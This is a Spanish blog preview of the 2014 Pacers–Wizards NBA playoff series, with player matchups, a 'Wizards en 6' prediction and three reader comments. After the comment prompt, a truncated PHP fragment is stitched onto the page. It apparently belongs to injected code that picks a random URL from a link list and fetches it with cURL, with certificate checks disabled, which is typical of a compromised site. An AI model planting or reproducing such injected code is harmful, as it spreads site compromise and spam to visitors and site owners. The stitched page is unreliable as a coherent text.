PO 2014: Previa Indiana Pacers – Washington Wizards

05 de May de 2014 por MagicJohnson32

george wall

Una vez superadas sus respectivas eliminatorias de primera ronda de forma y con sensaciones radicalmente opuestas, Wizards y Pacers disputarán la primera semifinal del Este. El agónico triunfo de Indiana, principal cabeza de serie de la conferencia, ante Atlanta no ha frenado la marcha cuesta abajo que iniciaron los Pacers en el último tramo de fase regular. Solo la ausencia de Horford y la debilidad casi endémica de la conferencia han indultado hasta el momento al equipo dirigido por Frank Vogel, que no podrá permitirse un nivel tan paupérrimo ante un rival que, sin figurar entre los candidatos, presenta más y mejores recursos que los Hawks. El 4-1 que los Wizards han endosado a los Bulls, incluyendo tres victorias en los partidos disputados en el United Center, convierte a los capitalinos en el equipo que de manera más contundente ha despachado la ronda inicial, si dejamos de lado el simulacro de serie entre Heat y Bobcats.

Cierto es que esto son los Playoffs, y ya se sabe que en los Playoffs no importa lo que haya sucedido en la anterior eliminatoria siempre que la hayas ganado. Excepto que no es cierto. El rendimiento ofrecido por unos y otros ha distado tanto que es inevitable pensar en los Wizards como favoritos, pese a que los Pacers cuentan con el factor cancha y que en la fase regular ganaron ocho partidos más que sus próximos rivales. No nos engañemos: Indiana alcanza las semifinales de Conferencia por las rentas obtenidas antes del All Star, porque los Heat se han tomado la regular season como un trámite y porque su rival en primera ronda, los Hawks, era de largo el peor equipo de los 16. Reconozcámosles a los chicos de Bird que, aunque a duras penas, supieron mantenerse a flote cuando lo más fácil era hundirse. En una situación límite -viajaron a Atlanta con un 3-2 en contra- los Pacers ganaron dos partidos consecutivos (algo que los titulares no conseguían en el último mes y medio) y, por tanto, siguen vivos y a tiempo de enderezar el rumbo. La oportunidad se les presenta a partir de esta misma noche (a la 1:00, hora española).

Claves de la eliminatoria

  • ¿Ha vuelto Hibbert? Fue a última hora y sin estridencias, pero Roy Hibbert finalmente apareció para recordarnos algunos de los motivos por los que fue seleccionado para el All-Star y por los que figuraba como nuestro primer favorito para el premio a mejor defensor de la temporada. Ante los Hawks, a Hibbert se le sumaron sus propias dudas existenciales con un planteamiento extremo por parte del rival, que apenas pisaba la pintura y desubicaba por completo al gigantón. Frente a Washington, con una pareja verdaderamente interior de calidad (Gortat-Nené) y un base que es un cuchillo, el pívot vuelve a ser imprescindible.
  • wall pacersAgainst the Wall: Incluso en los mejores momentos de los Pacers, George Hill se presentaba como el eslabón más débil de la cadena de Vogel. John Wall lo va a sacar de rueda a placer y va a hacerse necesario aquel bloque granítico que puede ser la defensa de Indiana cuando se lo proponen. Si Wall recupera el acierto en los triples que parece haber perdido en las últimas semanas, se vuelve imparable y entonces el panorama es muy alentador para los Wizards.
  • Balones al bueno: Durante la serie ante Atlanta, Paul George anotó 24 puntos o más en seis de los siete partidos. La pesadilla que resulta cada ataque de Indiana lo sería mucho más sin el talento de George, que con frecuencia rescata a su equipo y saca puntos de la nada. De nuevo recaerá sobre él la responsabilidad anotadora, aunque no lo va a tener fácil ante los largos brazos de Trevor Ariza.
  • X-Men: No son las estrellas de sus equipos, ni los máximos anotadores, ni los líderes defensivos, pero Lance Stephenson y Bradley Beal son el factor X de Pacers y Wizards. Su rendimiento sirve de termómetro de lo que unos y otros se aproximan a sus mejores versiones y se da la circunstancia de que ambos son escoltas y se emparejarán la mayor parte del tiempo en un duelo decisivo para el devenir de estas series.
  • ¿Hay alguien ahí? Pese a contar con nombres ilustres y de calidad indiscutible en sus respectivos banquillos, Frank Vogel y Randy Wittman han apostado hasta el momento por un inmovilismo un tanto inquietante. En el caso de los Wizards, tanto Ariza como Beal y Wall rondan los 40 minutos por partido, mientras Andre Miller apenas alcanza los 10. Más extremo aun es el caso de Vogel con Evan Turner, quien promedió 12 minutos en los primeros cinco encuentros de estos Playoffs y que ni siquiera apareció en los dos últimos. Vogel ya ha demostrado que le cuesta reaccionar ante los desafíos tácticos. Falta por ver si Wittman es capaz de plantearle alguno.

Pronóstico: unos Pacers al nivel de diciembre se merendarían a estos Wizards en no más de 5 partidos, y de hecho los dos enfrentamientos entre ambos equipos disputados en la primera mitad de temporada resultaron en victorias aplastantes para Indiana. Pero aquel equipo es cosa del pasado, parece que se fue para no volver y nada invita a imaginar lo contrario. Por tanto, Wizards en 6.

Comenta

3 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Pacers en 6 digo yo, entonándose pero aún lejos de su nivel.

      Citar

  2. Lucho dice:
    #2

    Coincido, Wizards 4-2

      Citar

  3. rumbero dice:
    #3

    A ver si vemos el renacer de Hibbert ante una pareja interior más clásica que no le exiga salir tanto. Sin mucha convicción voy a decir Pacers en 6, y eso que los Wizards me gustaron mucho ante los Bulls. Muchas ganar de ver a Beal en su duelo con Stephenson

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>